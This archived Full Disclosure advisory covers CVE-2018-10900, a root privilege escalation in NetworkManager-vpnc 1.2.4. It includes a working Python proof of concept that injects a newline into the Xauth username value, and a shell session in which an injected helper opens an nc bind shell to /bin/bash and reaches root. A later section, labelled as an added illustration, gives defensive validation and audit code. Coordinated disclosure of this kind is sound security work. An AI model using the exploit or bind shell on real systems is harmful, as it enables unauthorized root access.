Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Related Vulnerabilities: CVE-2018-10900  
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<h1 class="m-title">Network Manager VPNC - Privilege Escalation (CVE-2018-10900)</h1>
<hr>
<em>From</em>: Denis Andzakovic via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Mon, 23 Jul 2018 16:58:33 +1200


<hr>
<pre style="margin: 0em;">Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: <a rel="nofollow" href="https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc">https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc</a>
Date Released: 21/07/2018  
CVE: CVE-2018-10900
Author: Denis Andzakovic  
Source: <a rel="nofollow" href="https://gitlab.gnome.org/GNOME/NetworkManager-vpnc">https://gitlab.gnome.org/GNOME/NetworkManager-vpnc</a>  
Affected Software: Network Manager VPNC – 1.2.4  

--[ Description
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A newline character can be used to
inject a Password helper parameter into the configuration data passed to vpnc, allowing an attacker to execute
arbitrary commands as root.

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN as
one "Key value" directive per line. By injecting a \n character into a configuration parameter, an attacker can coerce
Network Manager into setting the Password helper option to an attacker-controlled executable file.

The following Python script creates a VPNC connection that executes /tmp/test when the connection is brought up. The
newline character is injected through the Xauth username parameter.

import dbus
con = {
    'vpn':{
        'service-type':'org.freedesktop.NetworkManager.vpnc',
        'data':{
            'IKE DH Group':'dh2',
            'IPSec ID':'testgroup',
            'IPSec gateway':'gateway',
            'IPSec secret-flags':'4',
            'Local Port':'0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused'
            }
    },
    'connection':{
        'type':'vpn',
        'id':'vpnc_test',
    },
    'ipv4':{'method':'auto'},
    'ipv6':{'method':'auto'}
}
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

When the connection is brought up, the script above results in the following configuration being passed to the vpnc
process, with the injected Password helper line immediately following the Xauth username value:

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950  --bus-name 
org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt

The following session shows the complete privilege escalation.

doi@ubuntu:~$ cat &lt;&lt; EOF &gt; /tmp/test
&gt; #!/bin/bash
&gt; mkfifo pipe
&gt; nc -k -l -p 8080 &lt; pipe | /bin/bash &gt; pipe
&gt; EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME                UUID                                  TYPE      DEVICE
Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
doi@ubuntu:~$ nmcli connection up vpnc_test

^Z
[1]+  Stopped                 nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)
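
As an added illustration (not code from the advisory or from NetworkManager-vpnc), the following Python shows the check
a patched service needs: values are validated before being written to vpnc's stdin, so a line break in a field such as
Xauth username cannot start a second directive. The key names are those shown above; the function names, the rejected
character set and the audit helper are this example's own assumptions.

```python
# Added example (not code from the advisory or from NetworkManager-vpnc):
# a hardened serializer for the line-oriented "Key value" text that the
# NM plugin writes to vpnc's stdin. Key names are those shown in the
# advisory; the function names and the policy are this example's own.

VPNC_CONFIG_KEYS = (
    "IKE DH Group", "IPSec ID", "IPSec gateway", "Local Port",
    "NAT Traversal Mode", "Perfect Forward Secrecy", "Vendor",
    "Xauth username",
)

# A value containing any of these could end the current line and start
# a new directive (the advisory's injected "Password helper" line).
FORBIDDEN_CHARS = ("\n", "\r", "\0")


class ConfigInjectionError(ValueError):
    """Raised when a connection value would inject a vpnc directive."""


def vpnc_config_line(key, value):
    """Return one 'Key value' line, refusing values that could split it."""
    for ch in FORBIDDEN_CHARS:
        if ch in value:
            raise ConfigInjectionError(
                "control character %r in value for %r" % (ch, key))
    return "%s %s" % (key, value)


def build_vpnc_config(data):
    """Serialize NetworkManager 'vpn.data' into vpnc stdin format.

    Only known keys are forwarded, and a value that would break the line
    structure raises instead of being passed through to vpnc.
    """
    lines = [vpnc_config_line(k, data[k]) for k in VPNC_CONFIG_KEYS
             if k in data]
    return "\n".join(lines) + "\n"


def audit_connection_data(data):
    """Return the keys of 'vpn.data' whose values contain a line break.

    Handy for checking stored connections on hosts that still run the
    vulnerable 1.2.4 plugin; an empty list means nothing suspicious.
    """
    return [k for k, v in data.items()
            if any(ch in v for ch in FORBIDDEN_CHARS)]
```

The audit helper can be run over the vpn.data of stored connections to find values that already carry a line break.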

--[ Timeline

11/07/2018 - Advisory sent to security () gnome org  
13/07/2018 - Acknowledgement from Gnome security  
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day  
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[ About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and 
review services.

W: <a rel="nofollow" href="https://pulsesecurity.co.nz">https://pulsesecurity.co.nz</a>
E: info at pulsesecurity.co.nz

</pre>